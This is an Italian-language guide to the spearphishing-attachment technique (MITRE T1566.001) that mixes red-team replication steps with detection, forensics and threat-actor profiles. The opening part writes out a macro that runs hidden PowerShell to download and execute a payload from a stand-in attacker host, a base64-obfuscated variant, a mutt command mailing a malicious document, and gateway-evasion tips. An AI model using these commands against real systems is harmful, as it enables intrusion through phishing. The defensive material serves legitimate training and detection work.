Spearphishing con Allegati: Phishing con Allegati Malevoli (T1566.001)

Per replicare efficacemente questa tecnica in ambiente controllato, inizia creando un documento Word con macro malevola. Apri Visual Basic Editor in Word e inserisci questo codice nella sezione ThisDocument:

Sub AutoOpen() Shell "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.local/payload.ps1')" End Sub

Il payload PowerShell può essere ospitato su un server web controllato. Per mascherare meglio l'attacco, incorpora il comando in una catena più complessa che include offuscamento base64:

$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object Net.WebClient).DownloadString("http://attacker.local/p.ps1")')) powershell.exe -enc $encoded

Per testare la tecnica del template injection remoto, crea un documento DOCX e modifica il file document.xml.rels all'interno dell'archivio ZIP. Sostituisci il target relationship con un URL remoto che punta al tuo template malevolo.

Su Linux, puoi simulare attacchi via attachment utilizzando mutt per l'invio automatizzato: echo "Please review the attached document" | mutt -s "Quarterly Report" -a malicious.doc -- target@victim.local

Per aumentare la credibilità, utilizza tecniche di spoofing del mittente attraverso server SMTP aperti o mal configurati. Strumenti come GoPhish o King Phisher permettono di orchestrare campagne complete con tracking dei click e aperture.

Quando testi archivi protetti da password, ricorda che molti gateway email non riescono ad analizzarli. Crea un ZIP con password "invoice2024" e includila nel corpo dell'email - questa tecnica è stata ampiamente utilizzata da TA551 e APT-C-36.

I red teamer più esperti combinano questa tecnica con payload in memoria per evitare detection. Un approccio efficace prevede l'uso di documenti HTA o CHM che eseguono codice JavaScript offuscato, tecnica documentata nell'uso da parte di APT41.

La detection efficace richiede correlazione multi-fonte tra logs email, eventi di file system e processi. Implementa una regola SIEM che correla l'arrivo di email con attachment (EventCode 4688 su Windows) alla creazione di processi figli sospetti entro una finestra temporale di 5 minuti.

Monitora specificamente le seguenti catene di processi tramite Sysmon EventID 1:

• winword.exe → cmd.exe/powershell.exe
• excel.exe → wscript.exe/cscript.exe
• outlook.exe → rundll32.exe con parametri anomali

Configura alert per archivi protetti da password controllando i log del gateway email. Pattern come "password:", "pw:" o "code:" nel corpo dell'email correlati ad attachment ZIP/RAR dovrebbero generare alert di priorità media.

Per ridurre i falsi positivi, implementa whitelist basate su hash per documenti legittimi ricorrenti come template aziendali. Utilizza il campo CommandLine in Sysmon per identificare parametri sospetti come "-nop", "-enc", o download da IP esterni.

La detection comportamentale deve includere monitoraggio delle connessioni di rete post-apertura documento. Processi Office che generano traffico verso IP esterni non categorizzati rappresentano un forte indicatore di compromissione.

Implementa regole specifiche per OutSteel e DarkWatchman che cercano pattern di staging in %TEMP% seguito da esecuzione. Query Splunk efficace:

index=sysmon EventCode=11 TargetFilename="\Temp\.exe" | join process_guid [search EventCode=1 ParentImage="\WINWORD.EXE"]*

Configura anche detection per tecniche di evasione comuni come doppia estensione (document.pdf.exe) e uso di caratteri Unicode right-to-left per mascherare le estensioni reali.

L'analisi forense di un attacco via spearphishing attachment inizia dalla ricostruzione della catena email → salvataggio → esecuzione. Su Windows, esamina innanzitutto la cartella %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache per tracce di attachment scaricati da webmail.

Il registro NTUSER.DAT contiene evidenze critiche nelle chiavi:

• HKCU\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents per documenti con macro abilitate
• HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU per file aperti recentemente

Analizza i Prefetch files (.pf) per identificare l'esecuzione di processi anomali correlati temporalmente all'apertura del documento. File come POWERSHELL.EXE-[hash].pf con timestamp vicini all'apertura del documento indicano esecuzione di payload.

Per ricostruire l'attività di Lazarus Group o APT28, cerca Zone.Identifier alternate data streams che indicano file scaricati da Internet. Comando PowerShell per verificare: Get-Item -Path .\suspicious.doc -Stream Zone.Identifier

Su sistemi Linux compromessi via attachment, esamina:

• ~/.bash_history per comandi eseguiti post-compromissione
• /var/log/mail.log per correlazione temporale con l'arrivo dell'email
• Directory temporanee come /tmp e /var/tmp per residui di payload

L'analisi della memoria volatile può rivelare processi iniettati. Utilizza Volatility con il plugin malfind per identificare injection derivanti da documenti malevoli. Pattern comuni includono allocazioni RWX in processi Office.

Per casi complessi come Operation Dream Job, correla metadata dei documenti (autore, timestamp di creazione) con intelligence su infrastrutture note del gruppo. Tool come olevba e oletools sono essenziali per estrarre e deoffuscare macro VBA.

APT29 rappresenta l'eccellenza nell'uso di spearphishing attachment, combinando documenti legittimi compromessi con exploit 0-day. Il gruppo preferisce archivi protetti da password contenenti ISO con DLL malevole, tecnica che permette bypass di Mark-of-the-Web. Geograficamente si concentra su target governativi occidentali e think tank, con picchi di attività correlati a eventi geopolitici.

Lazarus Group ha evoluto le sue tecniche dal 2019, passando da semplici macro a complesse catene che coinvolgono template injection e LOLBins. Durante Operation Dream Job hanno utilizzato lure tematiche altamente personalizzate basate su profili LinkedIn delle vittime. Il gruppo mantiene infrastrutture separate per diverse campagne ma riutilizza spesso temi legati a opportunità lavorative nel settore aerospace e crypto.

TA505 opera con volumi massivi, distribuendo Emotet e successivamente IcedID attraverso campagne spray-and-pray. Caratteristica distintiva: rotazione rapida dell'infrastruttura con domini registrati 24-48 ore prima dell'uso. Il gruppo mostra pattern stagionali con picchi durante periodi fiscali e shopping natalizio.

Kimsuky si distingue per l'uso di documenti HWP (Hangul Word Processor) targeting specificamente Corea del Sud. Il gruppo mantiene lunghe campagne di raccolta intelligence con documenti tematici su questioni militari e diplomatiche della penisola coreana. Overlap infrastrutturale minimo tra campagne suggerisce compartimentazione operativa.

Pattern emergenti includono l'abbandono progressivo delle macro VBA in favore di tecniche alternative come XLL Excel add-ins e file LNK in archivi. Mustang Panda nel 2024 ha introdotto catene di infezione che sfruttano legitimate DLL side-loading, indicando adattamento alle nuove protezioni Microsoft.

Tecnica documentata nel framework MITRE ATT&CK. Riferimenti a campagne Operation Dream Job, Operation Spalax, Frankenstein. Risorse di detection includono Sigma rules per Sysmon e strategie di correlazione multi-sorgente per ambienti Windows, Linux e macOS.